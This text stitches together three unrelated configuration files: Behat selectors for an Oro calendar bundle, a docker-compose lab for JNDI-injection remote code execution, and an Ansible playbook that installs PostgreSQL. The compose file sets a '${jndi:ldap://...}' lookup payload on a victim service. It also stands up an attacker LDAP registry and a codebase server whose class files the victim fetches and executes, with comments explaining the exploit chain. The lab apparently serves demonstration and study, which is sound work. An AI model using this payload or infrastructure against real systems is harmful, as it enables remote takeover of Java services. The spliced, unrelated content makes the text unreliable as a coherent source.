class: Oro\Bundle\CalendarBundle\Tests\Behat\Element\CalendarEvent
selector: '.fc-event'
Calendar Event Info:
class: Oro\Bundle\CalendarBundle\Tests\Behat\Element\CalendarEventInfo
selector: '.ui-dialog'
First All Day Cell:
selector:
type: 'xpath'
locator: '(//*[contains(@class, "fc-week")]/descendant::*[contains(@class, "fc-content-skeleton")]/descendant::td)[2]'
Multiday Event:
selector:
type: 'xpath'
locator: '//td[contains(@class, "fc-event-container")][@colspan]/*[contains(@class, "fc-event")]'
Event Form:
class: Oro\Bundle\CalendarBundle\Tests\Behat\Element\EventForm
selector: 'form[name="oro_calendar_event_form"]'
options:
mapping:
Start: 'oro_calendar_event_form[start]'
End: 'oro_calendar_event_form[end]'
Start Datetime:
selector: '[name="oro_calendar_event_form[start]"]'
End Datetime:
selector: '[name="oro_calendar_event_form[end]"]'
All Day Event:
selector: '[name="oro_calendar_event_form[allDay]"]'
EndsRecurrence:
class: Oro\Bundle\CalendarBundle\Tests\Behat\Element\EventRecurrence\End
selector: 'div[data-name="recurrence-ends"]'
DailyRecurrence:
class: Oro\Bundle\CalendarBundle\Tests\Behat\Element\EventRecurrence\Daily
selector: 'div[data-name="recurrence-daily"]'
WeeklyRecurrence:
class: Oro\Bundle\CalendarBundle\Tests\Behat\Element\EventRecurrence\Weekly
selector: 'div[data-name="recurrence-weekly"]'
MonthlyRecurrence:
class: Oro\Bundle\CalendarBundle\Tests\Behat\Element\EventRecurrence\Monthly
selector: 'div[data-name="recurrence-monthly"]'
YearlyRecurrence:
class: Oro\Bundle\CalendarBundle\Tests\Behat\Element\EventRecurrence\Yearly
selector: 'div[data-name="recurrence-yearly"]'
Empty slot:
selector:
locator: '//tr[@data-time="10:30:00"]'
type: xpath
Select Expected Close Date:
selector:
locator: '//input[@placeholder="Choose a date"]'
type: xpath
Today:
selector:
locator: '//button[@class="ui-datepicker-current ui-state-default ui-priority-secondary ui-corner-all"]'
type: xpath
My Calendar Choose Color Menu:
class: Oro\Bundle\CalendarBundle\Tests\Behat\Element\MyCalendarChooseColorMenu
selector: 'li[data-calendar-alias="user"] button.context-menu-button'
Calendar Activity Item:
selector:
locator: '//div[@class="accordion-heading"]'
type: xpath
System Calendars Grid:
selector: 'div[data-page-component-name="system-calendar-grid"]'
class: Oro\Bundle\DataGridBundle\Tests\Behat\Element\Grid
Event in calendar March 31:
selector: '.fc-event-container span.fc-title:contains("All-Day event with repeats 31")'
|
Tests/Behat/behat.yml
|
version: "3"
services:
# The service on which to gain RCE
victim:
build:
context: ${PWD}/src/victim/
dockerfile: ${PWD}/docker/gradle-app.Dockerfile
args:
APP_NAME: "victim"
environment:
JAVA_OPTS: >-
-Dvictim-payload=$${jndi:ldap://attacker_ldap_registry:1389/cn=made-class,dc=ldap-registry,dc=attacker}
depends_on:
- attacker_ldap_registry
- attacker_ldap_registry_setup
- attacker_codebase
# The attacker hosts a server which the victim can use to look up the location
# of the code to execute. Specifically, the directory server will contain a
# `Reference` containing a factory class to use to construct an object. This
# factory class is executed on the victim, giving RCE.
#
# Many frameworks can be used for this, including RMI and CORBA. We just use
# an LDAP server.
attacker_ldap_registry:
image: "bitnami/openldap:2.5"
environment:
LDAP_PORT_NUMBER: "1389"
LDAP_ROOT: "dc=ldap-registry,dc=attacker"
LDAP_ADMIN_USERNAME: "admin"
LDAP_ADMIN_PASSWORD: "<PASSWORD>"
LDAP_USERS: "nobody"
LDAP_PASSWORDS: "<PASSWORD>"
LDAP_GROUP: "users"
LDAP_EXTRA_SCHEMAS: "cosine,inetorgperson,nis,java,corba"
LDAP_ALLOW_ANON_BINDING: "yes"
ports:
- "1389:1389"
# The LDAP registry must be initialized with data. The `Reference` must be
# placed into the directory. This could easily be done with an LDIF file on
# bootstrap, but we write a Kotlin program to do that for us.
attacker_ldap_registry_setup:
build:
context: ${PWD}/src/attacker_ldap_registry_setup/
dockerfile: ${PWD}/docker/gradle-app.Dockerfile
args:
APP_NAME: "attacker_ldap_registry_setup"
environment:
JAVA_OPTS: >-
-Dattacker-ldap-registry-url=ldap://attacker_ldap_registry:1389/dc=ldap-registry,dc=attacker
-Dattacker-codebase-url=http://attacker_codebase:80/
depends_on:
- attacker_ldap_registry
# The victim needs to know the classes of the objects the attacker feeds it.
# In Java parlance, the victim needs to know the "codebase" of the attacker.
# We set that up here. This HTTP server will host the `.class` files needed by
# the victim for remote code execution.
attacker_codebase:
build:
context: ${PWD}/src/attacker_codebase
dockerfile: ${PWD}/docker/gradle-java-codebase.Dockerfile
ports:
- "8080:80"
|
docker-compose.yml
|
# The standard ca-certs are needed because without them apt_key will fail to
# validate www.postgresql.org (or probably any other source).
- name: PostgreSQL | Make sure the CA certificates are available
yum:
name: ca-certificates
state: present
- name: "Create temp directory"
become: false
connection: local
file:
path: ".tmp/{{inventory_hostname}}"
state: directory
- name: PostgreSQL | Download repository RPM
connection: local
become: false
get_url:
dest: ".tmp/{{inventory_hostname}}/postgres_{{ postgresql_version_terse }}_repository.rpm"
url: "{{ postgresql_yum_repository_url }}"
changed_when: false
- name: PostgreSQL | Copy repository RPM to server
copy:
src: ".tmp/{{inventory_hostname}}/postgres_{{ postgresql_version_terse }}_repository.rpm"
dest: "/tmp//postgres_{{ postgresql_version_terse }}_repository.rpm"
- name: PostgreSQL | Add PostgreSQL repository
yum:
name: "/tmp/postgres_{{ postgresql_version_terse }}_repository.rpm"
state: present
- name: PostgreSQL | Switch to http
replace:
dest: "/etc/yum.repos.d/pgdg-{{ postgresql_version_terse }}-redhat.repo"
regexp: "https"
replace: "http"
when: "http_proxy is not none"
- name: PostgreSQL | Add proxy to repo
lineinfile:
dest: "/etc/yum.repos.d/pgdg-{{ postgresql_version_terse }}-redhat.repo"
insertafter: "^{{ item | regex_escape() }}"
line: "proxy={{ http_proxy }} #{{ item }}"
with_items:
- "[pgdg{{ postgresql_version_terse }}]"
- "[pgdg{{ postgresql_version_terse }}-source]"
when: "http_proxy is not none"
- name: PostgreSQL | Make sure the dependencies are installed
yum:
name: "{{ item }}"
state: present
update_cache: yes
with_items: ["python-psycopg2", "python-pycurl", "glibc-common"]
- name: PostgreSQL | Install PostgreSQL
yum:
name: "{{ item }}"
state: present
environment: "{{ postgresql_env }}"
with_items:
- "postgresql{{ postgresql_version_terse }}-server"
- "postgresql{{ postgresql_version_terse }}"
- "postgresql{{ postgresql_version_terse }}-contrib"
- name: PostgreSQL | PGTune
yum:
name: pgtune
state: present
environment: "{{ postgresql_env }}"
when: postgresql_pgtune
|
tasks/install_yum.yml
|